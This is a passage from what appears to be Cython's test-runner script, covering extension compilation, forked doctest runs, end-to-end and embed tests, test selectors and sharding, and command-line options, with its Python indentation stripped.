if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file=os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in blacklist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None,
capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + old_path
env['PYTHONPATH'] = new_path
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = 'cython.py'
if sys.version_info[0] >=3 and CY3_DIR:
cython = os.path.join(CY3_DIR, cython)
cython = os.path.abspath(os.path.join('..', '..', cython))
self.assertEqual(0, os.system(
"make PYTHON='%s' CYTHON='%s' LIBDIR1='%s' test > make.output" % (sys.executable, cython, libdir)))
try:
os.remove('make.output')
except OSError:
pass
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, mod in deps.items():
try:
__import__(mod)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = (testname in self.excludes
or testname.split('.')[-1] in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# determanistic partition of the tests which is important.
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(testname) & 0x7fffffff if _is_py2 else _hash(testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.capture:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
